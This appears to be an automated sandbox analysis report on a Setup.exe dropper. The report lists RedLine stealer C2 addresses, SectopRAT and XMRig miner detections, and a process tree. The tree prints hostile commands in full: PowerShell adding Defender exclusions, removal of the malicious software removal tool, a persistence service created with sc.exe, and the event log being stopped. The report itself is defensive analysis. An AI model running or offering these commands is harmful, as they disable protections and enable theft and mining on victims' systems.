Analysis
-
max time kernel
149s -
max time network
138s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
30-06-2024 17:37
Static task
static1
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Setup.exe
Resource
win10v2004-20240508-en
General
-
Target
Setup.exe
-
Size
12.5MB
-
MD5
3ba515e7df4c8918a967f4043cd8c72b
-
SHA1
3659a765f502297fb92a9d14b08e5b8d91bc8603
-
SHA256
5234a3b9c46390f23a13c401cd294dadc63944ed57a19b26ff4e7211442e0482
-
SHA512
010d639a231724425e791afccc7fabacd9b20269665706434c28eba6192af5b424a792755ff1503c0e0afcdd05c5b470d59f57f706f843157c42212e0bb40d8c
-
SSDEEP
393216:Y9XWBQ/bXZmSUGkVAqYwm9MlpcghwvWLT0Z:Y9GBmZkVAqYweMbIWfo
Malware Config
Extracted
redline
MergedALL
51.195.206.227:38719
Extracted
redline
telegramone
163.5.160.27:51523
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\mergedALL.exe family_redline C:\Users\Admin\AppData\Local\Temp\fix.exe family_redline behavioral1/memory/2632-56-0x0000000000F30000-0x0000000000F80000-memory.dmp family_redline behavioral1/memory/2396-57-0x0000000000310000-0x000000000032E000-memory.dmp family_redline -
SectopRAT payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\fix.exe family_sectoprat behavioral1/memory/2396-57-0x0000000000310000-0x000000000032E000-memory.dmp family_sectoprat -
XMRig Miner payload 9 IoCs
Processes:
resource yara_rule behavioral1/memory/1604-256-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1604-255-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1604-258-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1604-262-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1604-261-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1604-259-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1604-260-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1604-263-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1604-264-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1556 powershell.exe 2144 powershell.exe 2548 powershell.exe 584 powershell.exe 1204 powershell.exe -
Creates new service(s) 2 TTPs
-
Executes dropped EXE 10 IoCs
Processes:
hamburger.exeNotepad.exemergedALL.exeetc test.exeNotepad.exefix.exetubpxzvwmyfr.exeesfowblknspo.exepid process 3024 hamburger.exe 2600 Notepad.exe 2632 mergedALL.exe 2104 etc test.exe 2376 Notepad.exe 2396 fix.exe 1148 480 1912 tubpxzvwmyfr.exe 532 esfowblknspo.exe -
Loads dropped DLL 13 IoCs
Processes:
Setup.exeNotepad.exeNotepad.exepid process 2240 Setup.exe 2240 Setup.exe 2240 Setup.exe 2240 Setup.exe 2240 Setup.exe 2240 Setup.exe 2600 Notepad.exe 2240 Setup.exe 2376 Notepad.exe 1148 480 480 480 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/1604-251-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1604-256-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1604-255-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1604-253-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1604-252-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1604-254-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1604-250-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1604-258-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1604-262-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1604-261-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1604-259-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1604-260-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1604-263-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1604-264-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 8 IoCs
Processes:
hamburger.exepowershell.exetubpxzvwmyfr.exepowershell.exeetc test.exepowershell.exeesfowblknspo.exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\MRT.exe hamburger.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe tubpxzvwmyfr.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe etc test.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe esfowblknspo.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
tubpxzvwmyfr.exeesfowblknspo.exedescription pid process target process PID 1912 set thread context of 2588 1912 tubpxzvwmyfr.exe conhost.exe PID 1912 set thread context of 1604 1912 tubpxzvwmyfr.exe conhost.exe PID 532 set thread context of 2248 532 esfowblknspo.exe conhost.exe -
Drops file in Windows directory 4 IoCs
Processes:
wusa.exewusa.exewusa.exewusa.exedescription ioc process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2032 sc.exe 2872 sc.exe 268 sc.exe 2148 sc.exe 2812 sc.exe 2796 sc.exe 1840 sc.exe 308 sc.exe -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\Notepad.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0268a2d14cbda01 powershell.exe -
Processes:
fix.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 fix.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 fix.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 fix.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 fix.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 fix.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 fix.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exemergedALL.exefix.exehamburger.exeetc test.exepowershell.exetubpxzvwmyfr.exepowershell.execonhost.exepowershell.exeesfowblknspo.exepowershell.exepid process 1204 powershell.exe 2632 mergedALL.exe 2396 fix.exe 2632 mergedALL.exe 2632 mergedALL.exe 2396 fix.exe 3024 hamburger.exe 2104 etc test.exe 1556 powershell.exe 3024 hamburger.exe 3024 hamburger.exe 3024 hamburger.exe 3024 hamburger.exe 3024 hamburger.exe 1912 tubpxzvwmyfr.exe 2548 powershell.exe 1912 tubpxzvwmyfr.exe 1912 tubpxzvwmyfr.exe 1912 tubpxzvwmyfr.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 2144 powershell.exe 2104 etc test.exe 2104 etc test.exe 2104 etc test.exe 2104 etc test.exe 2104 etc test.exe 532 esfowblknspo.exe 584 powershell.exe 532 esfowblknspo.exe 532 esfowblknspo.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe 1604 conhost.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
powershell.exefix.exemergedALL.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1204 powershell.exe Token: SeDebugPrivilege 2396 fix.exe Token: SeDebugPrivilege 2632 mergedALL.exe Token: SeDebugPrivilege 1556 powershell.exe Token: SeDebugPrivilege 2548 powershell.exe Token: SeLockMemoryPrivilege 1604 conhost.exe Token: SeDebugPrivilege 2144 powershell.exe Token: SeDebugPrivilege 584 powershell.exe -
Suspicious use of WriteProcessMemory 62 IoCs
Processes:
Setup.exeNotepad.execmd.exetubpxzvwmyfr.execmd.execmd.exeesfowblknspo.execmd.exedescription pid process target process PID 2240 wrote to memory of 1204 2240 Setup.exe powershell.exe PID 2240 wrote to memory of 1204 2240 Setup.exe powershell.exe PID 2240 wrote to memory of 1204 2240 Setup.exe powershell.exe PID 2240 wrote to memory of 1204 2240 Setup.exe powershell.exe PID 2240 wrote to memory of 3024 2240 Setup.exe hamburger.exe PID 2240 wrote to memory of 3024 2240 Setup.exe hamburger.exe PID 2240 wrote to memory of 3024 2240 Setup.exe hamburger.exe PID 2240 wrote to memory of 3024 2240 Setup.exe hamburger.exe PID 2240 wrote to memory of 2600 2240 Setup.exe Notepad.exe PID 2240 wrote to memory of 2600 2240 Setup.exe Notepad.exe PID 2240 wrote to memory of 2600 2240 Setup.exe Notepad.exe PID 2240 wrote to memory of 2600 2240 Setup.exe Notepad.exe PID 2240 wrote to memory of 2632 2240 Setup.exe mergedALL.exe PID 2240 wrote to memory of 2632 2240 Setup.exe mergedALL.exe PID 2240 wrote to memory of 2632 2240 Setup.exe mergedALL.exe PID 2240 wrote to memory of 2632 2240 Setup.exe mergedALL.exe PID 2240 wrote to memory of 2104 2240 Setup.exe etc test.exe PID 2240 wrote to memory of 2104 2240 Setup.exe etc test.exe PID 2240 wrote to memory of 2104 2240 Setup.exe etc test.exe PID 2240 wrote to memory of 2104 2240 Setup.exe etc test.exe PID 2600 wrote to memory of 2376 2600 Notepad.exe Notepad.exe PID 2600 wrote to memory of 2376 2600 Notepad.exe Notepad.exe PID 2600 wrote to memory of 2376 2600 Notepad.exe Notepad.exe PID 2240 wrote to memory of 2396 2240 Setup.exe fix.exe PID 2240 wrote to memory of 2396 2240 Setup.exe fix.exe PID 2240 wrote to memory of 2396 2240 Setup.exe fix.exe PID 2240 wrote to memory of 2396 2240 Setup.exe fix.exe PID 2524 wrote to memory of 2592 2524 cmd.exe wusa.exe PID 2524 wrote to memory of 2592 2524 cmd.exe wusa.exe PID 2524 wrote to memory of 2592 2524 cmd.exe wusa.exe PID 1912 wrote to memory of 2588 1912 tubpxzvwmyfr.exe conhost.exe PID 1912 wrote to memory of 2588 1912 tubpxzvwmyfr.exe conhost.exe PID 1912 wrote to memory of 2588 1912 tubpxzvwmyfr.exe conhost.exe PID 1912 wrote to memory of 2588 1912 tubpxzvwmyfr.exe conhost.exe PID 1912 wrote to memory of 2588 1912 tubpxzvwmyfr.exe conhost.exe PID 1912 wrote to memory of 2588 1912 tubpxzvwmyfr.exe conhost.exe PID 1912 wrote to memory of 2588 1912 tubpxzvwmyfr.exe conhost.exe PID 1912 wrote to memory of 2588 1912 tubpxzvwmyfr.exe conhost.exe PID 1912 wrote to memory of 2588 1912 tubpxzvwmyfr.exe conhost.exe PID 1912 wrote to memory of 1604 1912 tubpxzvwmyfr.exe conhost.exe PID 1912 wrote to memory of 1604 1912 tubpxzvwmyfr.exe conhost.exe PID 2320 wrote to memory of 768 2320 cmd.exe wusa.exe PID 2320 wrote to memory of 768 2320 cmd.exe wusa.exe PID 2320 wrote to memory of 768 2320 cmd.exe wusa.exe PID 1912 wrote to memory of 1604 1912 tubpxzvwmyfr.exe conhost.exe PID 1912 wrote to memory of 1604 1912 tubpxzvwmyfr.exe conhost.exe PID 1912 wrote to memory of 1604 1912 tubpxzvwmyfr.exe conhost.exe PID 2996 wrote to memory of 2888 2996 cmd.exe wusa.exe PID 2996 wrote to memory of 2888 2996 cmd.exe wusa.exe PID 2996 wrote to memory of 2888 2996 cmd.exe wusa.exe PID 532 wrote to memory of 2248 532 esfowblknspo.exe conhost.exe PID 532 wrote to memory of 2248 532 esfowblknspo.exe conhost.exe PID 532 wrote to memory of 2248 532 esfowblknspo.exe conhost.exe PID 532 wrote to memory of 2248 532 esfowblknspo.exe conhost.exe PID 532 wrote to memory of 2248 532 esfowblknspo.exe conhost.exe PID 532 wrote to memory of 2248 532 esfowblknspo.exe conhost.exe PID 532 wrote to memory of 2248 532 esfowblknspo.exe conhost.exe PID 532 wrote to memory of 2248 532 esfowblknspo.exe conhost.exe PID 532 wrote to memory of 2248 532 esfowblknspo.exe conhost.exe PID 1248 wrote to memory of 2256 1248 cmd.exe wusa.exe PID 1248 wrote to memory of 2256 1248 cmd.exe wusa.exe PID 1248 wrote to memory of 2256 1248 cmd.exe wusa.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAYgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAegBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAagBuACMAPgA="2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\hamburger.exe"C:\Users\Admin\AppData\Local\Temp\hamburger.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
- Drops file in Windows directory
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "UPFRTHSI"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "UPFRTHSI" binpath= "C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe" start= "auto"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "UPFRTHSI"3⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\Notepad.exe"C:\Users\Admin\AppData\Local\Temp\Notepad.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Notepad.exe"C:\Users\Admin\AppData\Local\Temp\Notepad.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\mergedALL.exe"C:\Users\Admin\AppData\Local\Temp\mergedALL.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\etc test.exe"C:\Users\Admin\AppData\Local\Temp\etc test.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
